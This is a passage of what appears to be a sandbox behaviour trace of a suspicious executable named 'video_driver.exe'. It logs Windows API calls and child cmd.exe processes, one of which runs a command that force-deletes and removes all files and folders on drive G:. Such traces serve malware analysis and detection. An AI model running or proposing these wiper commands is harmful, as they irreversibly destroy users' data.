lpFilePart=0x31f68c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31f68c*="Desktop") returned 0x25 [0057.895] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0057.895] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x31f40c | out: lpFindFileData=0x31f40c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x795760 [0057.895] FindClose (in: hFindFile=0x795760 | out: hFindFile=0x795760) returned 1 [0057.895] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x31f40c | out: lpFindFileData=0x31f40c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x108960, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x108960, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x795760 [0057.896] FindClose (in: hFindFile=0x795760 | out: hFindFile=0x795760) returned 1 [0057.896] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0057.896] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x31f40c | out: lpFindFileData=0x31f40c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x795760 [0057.896] FindClose (in: hFindFile=0x795760 | out: hFindFile=0x795760) returned 1 [0057.896] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0057.896] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0057.896] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0057.896] GetProcessHeap () returned 0x780000 [0057.896] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x794c70 | out: hHeap=0x780000) returned 1 [0057.896] GetEnvironmentStringsW () returned 0x794180* [0057.896] GetProcessHeap () returned 0x780000 [0057.896] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0xb36) returned 0x795fa0 [0057.897] FreeEnvironmentStringsW (penv=0x794180) returned 1 [0057.897] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.897] GetProcessHeap () returned 0x780000 [0057.897] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7917c8 | out: hHeap=0x780000) returned 1 [0057.897] GetProcessHeap () returned 0x780000 [0057.897] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x400e) returned 0x796ae0 [0057.897] GetProcessHeap () returned 0x780000 [0057.897] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0xa0) returned 0x792e50 [0057.898] GetProcessHeap () returned 0x780000 [0057.898] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x796ae0 | out: hHeap=0x780000) returned 1 [0057.898] GetConsoleOutputCP () returned 0x1b5 [0057.898] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0057.898] GetUserDefaultLCID () returned 0x409 [0057.899] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0057.899] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x31f7d0, cchData=128 | out: lpLCData="0") returned 2 [0057.899] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x31f7d0, cchData=128 | out: lpLCData="0") returned 2 [0057.899] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x31f7d0, cchData=128 | out: lpLCData="1") returned 2 [0057.899] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0057.899] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0057.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0057.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0057.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0057.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0057.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0057.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0057.900] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0057.900] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0057.900] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0057.902] GetProcessHeap () returned 0x780000 [0057.902] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x20c) returned 0x792ef8 [0057.902] GetConsoleTitleW (in: lpConsoleTitle=0x792ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0057.902] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0057.902] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0057.902] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0057.902] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0057.903] GetProcessHeap () returned 0x780000 [0057.903] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x400a) returned 0x796ae0 [0057.903] GetProcessHeap () returned 0x780000 [0057.903] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x4008) returned 0x79aaf8 [0057.903] GetProcessHeap () returned 0x780000 [0057.903] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x1a) returned 0x7957e0 [0057.903] GetEnvironmentVariableW (in: lpName="p IN (\"E", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0057.903] _wcsicmp (_String1="p IN (\"E", _String2="CD") returned 13 [0057.904] _wcsicmp (_String1="p IN (\"E", _String2="ERRORLEVEL") returned 11 [0057.904] _wcsicmp (_String1="p IN (\"E", _String2="CMDEXTVERSION") returned 13 [0057.904] _wcsicmp (_String1="p IN (\"E", _String2="CMDCMDLINE") returned 13 [0057.904] _wcsicmp (_String1="p IN (\"E", _String2="DATE") returned 12 [0057.904] _wcsicmp (_String1="p IN (\"E", _String2="TIME") returned -4 [0057.904] _wcsicmp (_String1="p IN (\"E", _String2="RANDOM") returned -2 [0057.904] _wcsicmp (_String1="p IN (\"E", _String2="HIGHESTNUMANODENUMBER") returned 8 [0057.904] GetProcessHeap () returned 0x780000 [0057.904] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7957e0 | out: hHeap=0x780000) returned 1 [0057.904] GetProcessHeap () returned 0x780000 [0057.904] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79aaf8 | out: hHeap=0x780000) returned 1 [0057.904] GetProcessHeap () returned 0x780000 [0057.904] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x4008) returned 0x79aaf8 [0057.904] GetProcessHeap () returned 0x780000 [0057.904] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79aaf8 | out: hHeap=0x780000) returned 1 [0057.904] GetProcessHeap () returned 0x780000 [0057.904] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x796ae0 | out: hHeap=0x780000) returned 1 [0057.904] _wcsicmp (_String1="if", _String2=")") returned 64 [0057.904] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0057.904] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0057.904] _wcsicmp (_String1="IF", _String2="if") returned 0 [0057.904] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0057.905] GetProcessHeap () returned 0x780000 [0057.905] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x58) returned 0x793110 [0057.905] GetProcessHeap () returned 0x780000 [0057.905] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0xe) returned 0x78ffc0 [0057.905] GetProcessHeap () returned 0x780000 [0057.905] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x20) returned 0x7957e0 [0057.906] GetProcessHeap () returned 0x780000 [0057.906] RtlReAllocateHeap (Heap=0x780000, Flags=0x0, Ptr=0x7957e0, Size=0x16) returned 0x791800 [0057.906] GetProcessHeap () returned 0x780000 [0057.906] RtlSizeHeap (HeapHandle=0x780000, Flags=0x0, MemoryPointer=0x791800) returned 0x16 [0057.906] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0057.906] GetProcessHeap () returned 0x780000 [0057.906] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x58) returned 0x793170 [0057.906] GetProcessHeap () returned 0x780000 [0057.906] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x14) returned 0x7931d0 [0057.907] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0057.907] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0057.907] GetProcessHeap () returned 0x780000 [0057.907] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x12) returned 0x7931f0 [0057.907] GetProcessHeap () returned 0x780000 [0057.907] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x1c) returned 0x7957e0 [0057.907] GetProcessHeap () returned 0x780000 [0057.907] RtlReAllocateHeap (Heap=0x780000, Flags=0x0, Ptr=0x7957e0, Size=0x14) returned 0x793210 [0057.907] GetProcessHeap () returned 0x780000 [0057.907] RtlSizeHeap (HeapHandle=0x780000, Flags=0x0, MemoryPointer=0x793210) returned 0x14 [0057.908] _wcsicmp (_String1="del", _String2=")") returned 59 [0057.908] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0057.908] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0057.908] _wcsicmp (_String1="IF", _String2="del") returned 5 [0057.908] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0057.908] _wcsicmp (_String1="REM", _String2="del") returned 14 [0057.908] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0057.908] GetProcessHeap () returned 0x780000 [0057.908] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x58) returned 0x793230 [0057.908] GetProcessHeap () returned 0x780000 [0057.908] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x10) returned 0x78ffd8 [0057.909] GetProcessHeap () returned 0x780000 [0057.909] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x28) returned 0x793290 [0057.909] GetProcessHeap () returned 0x780000 [0057.909] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x58) returned 0x7932c0 [0057.910] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0057.910] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0057.910] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0057.910] GetProcessHeap () returned 0x780000 [0057.910] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x58) returned 0x793320 [0057.910] GetProcessHeap () returned 0x780000 [0057.910] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x44) returned 0x793380 [0057.910] GetProcessHeap () returned 0x780000 [0057.910] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x14) returned 0x7933d0 [0057.911] GetProcessHeap () returned 0x780000 [0057.911] RtlReAllocateHeap (Heap=0x780000, Flags=0x0, Ptr=0x7933d0, Size=0x12) returned 0x7933d0 [0057.911] GetProcessHeap () returned 0x780000 [0057.911] RtlSizeHeap (HeapHandle=0x780000, Flags=0x0, MemoryPointer=0x7933d0) returned 0x12 [0057.911] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0057.911] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0057.911] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0057.911] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0057.911] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0057.912] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0057.912] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0057.913] GetProcessHeap () returned 0x780000 [0057.913] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x12) returned 0x7933f0 [0057.913] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0057.914] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0057.914] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0057.914] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0057.914] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0057.914] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0057.914] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0057.914] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0057.914] GetProcessHeap () returned 0x780000 [0057.914] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x58) returned 0x793410 [0057.914] GetProcessHeap () returned 0x780000 [0057.914] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x14) returned 0x793470 [0057.915] GetProcessHeap () returned 0x780000 [0057.915] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x20) returned 0x7957e0 [0058.006] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0058.007] GetFullPathNameW (in: lpFileName="E:", nBufferLength=0x208, lpBuffer=0x31f4c0, lpFilePart=0x31f26c | out: lpBuffer="E:\\", lpFilePart=0x31f26c*=0x0) returned 0x3 [0058.008] wcsncmp (_String1="E:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -23 [0058.012] GetFileAttributesW (lpFileName="E:\\" (normalized: "e:")) returned 0xffffffff [0058.013] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.013] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0058.013] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.013] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0058.014] _get_osfhandle (_FileHandle=0) returned 0x3 [0058.014] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0058.014] SetConsoleInputExeNameW () returned 0x1 [0058.014] GetConsoleOutputCP () returned 0x1b5 [0058.015] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0058.015] SetThreadUILanguage (LangId=0x0) returned 0x409 [0058.015] exit (_Code=0) Process: id = "26" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x435e6000" os_pid = "0x8e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"G:\" del /f /s /q \"G:\" & FOR /D %p IN (\"G:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 32 os_tid = 0x8f8 [0058.237] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3ff9c4 | out: lpSystemTimeAsFileTime=0x3ff9c4*(dwLowDateTime=0x23405a0, dwHighDateTime=0x1d62400)) [0058.237] GetCurrentProcessId () returned 0x8e8 [0058.237] GetCurrentThreadId () returned 0x8f8 [0058.237] GetTickCount () returned 0x1146b9f [0058.237] QueryPerformanceCounter (in: lpPerformanceCount=0x3ff9bc | out: lpPerformanceCount=0x3ff9bc*=17837144323) returned 1 [0058.241] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0058.241] __set_app_type (_Type=0x1) [0058.241] __p__fmode () returned 0x770331f4 [0058.241] __p__commode () returned 0x770331fc [0058.241] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0058.241] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0058.242] GetCurrentThreadId () returned 0x8f8 [0058.242] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8f8) returned 0x60 [0058.242] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0058.242] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0058.242] SetThreadUILanguage (LangId=0x0) returned 0x409 [0058.432] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0058.432] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ff954 | out: phkResult=0x3ff954*=0x0) returned 0x2 [0058.432] VirtualQuery (in: lpAddress=0x3ff98b, lpBuffer=0x3ff924, dwLength=0x1c | out: lpBuffer=0x3ff924*(BaseAddress=0x3ff000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0058.432] VirtualQuery (in: lpAddress=0x300000, lpBuffer=0x3ff924, dwLength=0x1c | out: lpBuffer=0x3ff924*(BaseAddress=0x300000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0058.432] VirtualQuery (in: lpAddress=0x301000, lpBuffer=0x3ff924, dwLength=0x1c | out: lpBuffer=0x3ff924*(BaseAddress=0x301000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0058.432] VirtualQuery (in: lpAddress=0x303000, lpBuffer=0x3ff924, dwLength=0x1c | out: lpBuffer=0x3ff924*(BaseAddress=0x303000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0058.432] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x3ff924, dwLength=0x1c | out: lpBuffer=0x3ff924*(BaseAddress=0x400000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0058.432] GetConsoleOutputCP () returned 0x1b5 [0058.433] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0058.433] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0058.433] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.433] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0058.433] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.433] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0058.433] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.433] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0058.434] _get_osfhandle (_FileHandle=0) returned 0x3 [0058.434] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0058.434] GetEnvironmentStringsW () returned 0x6520f8* [0058.434] GetProcessHeap () returned 0x640000 [0058.434] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xaca) returned 0x652bd0 [0058.434] FreeEnvironmentStringsW (penv=0x6520f8) returned 1 [0058.434] GetProcessHeap () returned 0x640000 [0058.434] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x4) returned 0x651898 [0058.434] GetEnvironmentStringsW () returned 0x6520f8* [0058.434] GetProcessHeap () returned 0x640000 [0058.434] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xaca) returned 0x6536a8 [0058.435] FreeEnvironmentStringsW (penv=0x6520f8) returned 1 [0058.435] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fe8c4 | out: phkResult=0x3fe8c4*=0x68) returned 0x0 [0058.435] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fe8cc, lpData=0x3fe8d0, lpcbData=0x3fe8c8*=0x1000 | out: lpType=0x3fe8cc*=0x0, lpData=0x3fe8d0*=0x0, lpcbData=0x3fe8c8*=0x1000) returned 0x2 [0058.435] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fe8cc, lpData=0x3fe8d0, lpcbData=0x3fe8c8*=0x1000 | out: lpType=0x3fe8cc*=0x4, lpData=0x3fe8d0*=0x1, lpcbData=0x3fe8c8*=0x4) returned 0x0 [0058.435] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fe8cc, lpData=0x3fe8d0, lpcbData=0x3fe8c8*=0x1000 | out: lpType=0x3fe8cc*=0x0, lpData=0x3fe8d0*=0x1, lpcbData=0x3fe8c8*=0x1000) returned 0x2 [0058.435] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fe8cc, lpData=0x3fe8d0, lpcbData=0x3fe8c8*=0x1000 | out: lpType=0x3fe8cc*=0x4, lpData=0x3fe8d0*=0x0, lpcbData=0x3fe8c8*=0x4) returned 0x0 [0058.435] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fe8cc, lpData=0x3fe8d0, lpcbData=0x3fe8c8*=0x1000 | out: lpType=0x3fe8cc*=0x4, lpData=0x3fe8d0*=0x40, lpcbData=0x3fe8c8*=0x4) returned 0x0 [0058.435] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fe8cc, lpData=0x3fe8d0, lpcbData=0x3fe8c8*=0x1000 | out: lpType=0x3fe8cc*=0x4, lpData=0x3fe8d0*=0x40, lpcbData=0x3fe8c8*=0x4) returned 0x0 [0058.435] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fe8cc, lpData=0x3fe8d0, lpcbData=0x3fe8c8*=0x1000 | out: lpType=0x3fe8cc*=0x0, lpData=0x3fe8d0*=0x40, lpcbData=0x3fe8c8*=0x1000) returned 0x2 [0058.435] RegCloseKey (hKey=0x68) returned 0x0 [0058.435] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fe8c4 | out: phkResult=0x3fe8c4*=0x68) returned 0x0 [0058.435] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fe8cc, lpData=0x3fe8d0, lpcbData=0x3fe8c8*=0x1000 | out: lpType=0x3fe8cc*=0x0, lpData=0x3fe8d0*=0x40, lpcbData=0x3fe8c8*=0x1000) returned 0x2 [0058.435] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fe8cc, lpData=0x3fe8d0, lpcbData=0x3fe8c8*=0x1000 | out: lpType=0x3fe8cc*=0x4, lpData=0x3fe8d0*=0x1, lpcbData=0x3fe8c8*=0x4) returned 0x0 [0058.436] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fe8cc, lpData=0x3fe8d0, lpcbData=0x3fe8c8*=0x1000 | out: lpType=0x3fe8cc*=0x0, lpData=0x3fe8d0*=0x1, lpcbData=0x3fe8c8*=0x1000) returned 0x2 [0058.436] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fe8cc, lpData=0x3fe8d0, lpcbData=0x3fe8c8*=0x1000 | out: lpType=0x3fe8cc*=0x4, lpData=0x3fe8d0*=0x0, lpcbData=0x3fe8c8*=0x4) returned 0x0 [0058.436] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fe8cc, lpData=0x3fe8d0, lpcbData=0x3fe8c8*=0x1000 | out: lpType=0x3fe8cc*=0x4, lpData=0x3fe8d0*=0x9, lpcbData=0x3fe8c8*=0x4) returned 0x0 [0058.436] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fe8cc, lpData=0x3fe8d0, lpcbData=0x3fe8c8*=0x1000 | out: lpType=0x3fe8cc*=0x4, lpData=0x3fe8d0*=0x9, lpcbData=0x3fe8c8*=0x4) returned 0x0 [0058.436] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fe8cc, lpData=0x3fe8d0, lpcbData=0x3fe8c8*=0x1000 | out: lpType=0x3fe8cc*=0x0, lpData=0x3fe8d0*=0x9, lpcbData=0x3fe8c8*=0x1000) returned 0x2 [0058.436] RegCloseKey (hKey=0x68) returned 0x0 [0058.436] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b67 [0058.436] srand (_Seed=0x5eb34b67) [0058.436] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"G:\" del /f /s /q \"G:\" & FOR /D %p IN (\"G:\") DO rmdir \"%p\" /s /q" [0058.436] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"G:\" del /f /s /q \"G:\" & FOR /D %p IN (\"G:\") DO rmdir \"%p\" /s /q" [0058.436] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0058.436] GetProcessHeap () returned 0x640000 [0058.436] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x210) returned 0x6520f8 [0058.436] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x652100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0058.437] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0058.437] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: 